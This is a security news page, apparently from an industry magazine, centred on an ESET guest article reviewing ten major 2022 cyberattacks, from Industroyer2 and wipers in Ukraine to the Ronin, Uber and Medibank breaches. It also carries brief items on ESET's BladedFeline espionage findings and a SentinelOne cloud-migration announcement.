Connect with us

Cyber Security

2022 in Review: 10 of the Year’s Biggest Cyberattacks

Published

on

Written by Phil Muncaster, guest writer at ESET

The past year has seen the global economy lurch from one crisis to another. As COVID-19 finally began to recede in many regions, what replaced it has been rising energy bills, soaring inflation, and a resulting cost-of-living crisis – some of it spurred by Russia’s invasion of Ukraine. Ultimately, these developments have opened the door to new opportunities for financially-motivated and state-backed threat actors.

They have targeted governments, hospitals, cryptocurrency firms, and many other organisations with impunity. The cost of a data breach now stands at nearly $4.4 million – and as long as threat actors continue to achieve successes like those below, we can expect it to rise even higher for 2023.

Here are 10 of the worst cyber incidents of the year, be it for the damage they wrought, the level of sophistication, or geopolitical fallout. The list is in no particular order, but it makes sense to open it with malicious cyber operations that took aim at Ukraine and immediately raised concerns about their wider ramifications and associated cyber risks faced by the wider world.

Ukraine under (cyber)attack: Ukraine’s critical infrastructure has found itself, yet again, in the crosshairs of threat actors. Early into Russia’s invasion, ESET researchers worked closely with CERT-UA on remediating an attack that targeted the country’s grid and involved destructive malware that Sandworm had attempted to deploy against high-voltage electrical substations. The malware – which ESET named Industroyer2 after an infamous piece of malware used by the group to cut power in Ukraine in 2016 – was used in combination with a new version of the destructive CaddyWiper variant, most likely to hide the group’s tracks, slow down incident response and prevent operators of the energy company from regaining control of the ICS consoles.

More wipers: CaddyWiper was far from the only destructive data wiper discovered in Ukraine just before or in the first few weeks of Russia’s invasion. On February 23rd, ESET telemetry picked up HermeticWiper on hundreds of machines in several organizations in Ukraine. The following day, a second destructive, data-wiping attack against a Ukrainian governmental network started, this time delivering IsaacWiper.

Internet down: Barely an hour before the invasion, a major cyberattack against commercial satellite internet company Viasat disrupted broadband internet service for thousands of people in Ukraine and even elsewhere in Europe, leaving behind thousands of bricked modems. The attack, which exploited a misconfigured VPN device to gain access to the satellite network’s management section, is believed to have been intended to impair the communication capabilities of the Ukrainian command during the first hours of the invasion. Its effects were felt far beyond Ukraine’s borders, however.

Conti in Costa Rica: A major player in the cybercrime underground this year was the ransomware-as-a-service (RaaS) group Conti. One of its most audacious raids was against the small South American nation of Costa Rica, where a national emergency was declared after the government branded a crippling attack an act of “cyber-terrorism.” The group has since disappeared, although its members are likely to simply have moved on to other projects or rebranded wholesale, as RaaS outfits generally due to avoid scrutiny from law enforcers and governments.

Other ransomware actors: There were also in action in 2022. A CISA alert from September explained that Iran-affiliated threat actors compromised a US municipal government and an aerospace company, among other targets, by exploiting the infamous Log4Shell bug for ransomware campaigns, which isn’t all that common for state-backed entities. Also intriguing was a US government compromise in November that was also blamed on Iran. An unnamed Federal Civilian Executive Branch (FCEB) organization was breached and crypto mining malware was deployed.

Ronin Network: This was created by Vietnamese blockchain game developer Sky Mavis to function as an Ethereum sidechain for its Axie Infinity game. In March it emerged that hackers managed to use hijacked private keys to forge withdrawals to the tune of 173,600 Ethereum ($592 million) and $25.5 million from the Ronin bridge, in two transactions. The resulting $618 million theft, at March prices, was the largest ever from a crypto firm. Infamous North Korean group Lazarus has since been linked to the raid. The hermit nation has been traced in the past to thefts worth billions of dollars, used to fund its nuclear and missile programs.

Lapsus$: This burst onto the scene in 2022, as an extortion group using high-profile data thefts to force payment from its corporate victims. These have included Microsoft, Samsung, Nvidia, Ubisoft, Okta and Vodafone. Among its many methods are bribery of insiders at firms and their contractors. Although the group had been relatively silent for a while, it re-emerged at the end of the year after hacking Grand Theft Auto developer Rockstar Games. Several alleged members of the group have been arrested in the UK and Brazil.

International Red Cross (ICRC): In January, the ICRC reported a major breach that compromised the personal details of over 515,000 “highly vulnerable” victims. Stolen from a Swiss contractor, the data included details of individuals separated from their families due to conflict, migration, and disaster, missing persons and their families, and people in detention. It was subsequently blamed on an unnamed nation-state and occurred when an unpatched system was exploited.

Uber: The ride-hailing giant was famously breached back in 2016 when details on 57 million users were stolen. In September it was reported that a hacker, potentially a member of Lapsus$, had compromised email and cloud systems, code repositories, an internal Slack account, and HackerOne tickets. The actor targeted an Uber external contractor, most likely grabbing their corporate password from the dark web.

Medibank: All of the Australian health insurance giant’s four million customers have personal data accessed by ransomware actors in an attack that may end up costing the firm US$35 million. Those responsible are believed to be linked to the infamous ransomware-as-a-service (RaaS) outfit REvil (aka Sodinokibi) with compromised privileged credentials responsible for initial access. Those impacted now face a potential barrage of follow-on identity fraud attempts.

Whatever happens in 2023, some of the cautionary tales from these 10 major incidents should stand everybody, including CISOs, in good stead. Get your cybersecurity processes and operations right, organize cybersecurity awareness training for all employees, and partner with reputable security companies whose solutions can stand up to the complex methods deployed by threat actors.

Cyber Security

ESET Research Uncovers Iran-Aligned BladedFeline Spying on Iraqi, Kurdish Officials

Published

on

The Iran-aligned threat group BladedFeline has targeted Kurdish and Iraqi government officials in a recent cyber-espionage campaign, according to ESET researchers. The group deployed a range of malicious tools discovered within the compromised systems, indicating a continued effort to maintain and expand access to high-ranking officials and government organizations in Iraq and the Kurdish region. The latest campaign highlights BladedFeline’s evolving capabilities, featuring two tunneling tools (Laret and Pinar), various supplementary tools, and, most notably, a custom backdoor Whisper and a malicious Internet Information Services (IIS) module PrimeCache, both identified and named by ESET.

Whisper logs into a compromised webmail account on a Microsoft Exchange server and uses it to communicate with the attackers via email attachments. PrimeCache also serves as a backdoor: it is a malicious IIS module. PrimeCache also bears similarities to the RDAT backdoor used by OilRig Advanced Persistent Threat (APT) group.

Based on these code similarities, as well as on further evidence presented in this blogpost, ESET assesses that BladedFeline is a very likely subgroup of OilRig, an Iran-aligned APT group going after governments and businesses in the Middle East. The initial implants in the latest campaign can be traced back to OilRig. These tools reflect the group’s strategic focus on persistence and stealth within targeted networks.

BladedFeline has consistently worked to maintain illicit access to Kurdish diplomatic officials, while simultaneously exploiting a regional telecommunications provider in Uzbekistan, and developing and maintaining access to officials in the government of Iraq.

ESET Research assesses that BladedFeline is targeting the Kurdish and Iraqi governments for cyberespionage purposes, with an eye toward maintaining strategic access to the computers of high-ranking officials in both governmental entities. The Kurdish diplomatic relationship with Western nations, coupled with the oil reserves in the Kurdistan region, makes it an enticing target for Iran-aligned threat actors to spy on and potentially manipulate. In Iraq, these threat actors are most probably trying to counter the influence of Western governments following the US invasion and occupation of the country.

In 2023, ESET Research discovered that BladedFeline targeted Kurdish diplomatic officials with the Shahmaran backdoor, and previously reported on its activities in ESET APT Activity reports. The group has been active since at least 2017, when it compromised officials within the Kurdistan Regional Government, but is not the only subgroup of OilRig that ESET Research is monitoring. ESET has been tracking Lyceum, also known as HEXANE or Storm-0133, as another OilRig subgroup. Lyceum focuses on targeting various Israeli organizations, including governmental and local governmental entities and organizations in healthcare.

ESET expects that BladedFeline will persist with implant development in order to maintain and expand access within its compromised victim set for cyberespionage.

Continue Reading

Cloud

SentinelOne Simplifies Secure Cloud Migrations on AWS

Published

on

SentinelOne today announced its participation in the Amazon Web Services (AWS) Independent Software Vendor (ISV) Workload Migration Program. This initiative supports AWS Partner Network (APN) members with SaaS offerings on AWS to accelerate and streamline workload migrations.

Through the program, SentinelOne will provide AWS customers with accelerated, secure cloud migration support, leveraging modern AI-powered CNAPP capabilities to ensure rapid and protected transitions. With access to AWS funding, technical resources, and go-to-market support, SentinelOne will help organizations reduce migration timelines and costs while maintaining robust security.

SentinelOne’s Singularity Cloud Security delivers real-time visibility and protection throughout the migration journey—whether from on-premises or another cloud—enabling a secure, seamless transition to AWS.

“Through our participation in the AWS ISV Workload Migration Program, SentinelOne is helping customers accelerate secure cloud migrations with end-to-end protection and visibility,” said Ric Smith, President of Product, Technology, and Operations at SentinelOne. “Whether moving from on-prem or another cloud to AWS, organizations can count on us to deliver the security they need throughout their journey—realizing the performance, speed, agility, and cost benefits of the cloud.”

Singularity Cloud Security combines agentless and agent-based protection for deep visibility, continuous posture management, and real-time threat detection across hybrid and multi-cloud environments. By collaborating with AWS and ecosystem partners, SentinelOne ensures seamless integration into migration projects, helping customers move faster, reduce risk, and scale confidently in the cloud.

Availability: SentinelOne’s solutions are available globally.

Continue Reading

Cyber Security

Beyond Blocklists: How Behavioural Intent Analysis Can Safeguard Middle East Businesses from Rising AI-Driven Bot Threats

Published

on

The Middle East is facing an unprecedented surge in AI-driven bot attacks, with malicious automation now outpacing traditional defenses. Mohammad Ismail, Vice President for EMEA at Cequence Security, warns that legacy tools like IP blocklists and rate limiting are no match for today’s sophisticated threats (more…)

Continue Reading
Advertisement

Follow Us

Trending

Copyright © 2021 Security Review Magazine. Rysha Media LLC. All Rights Reserved.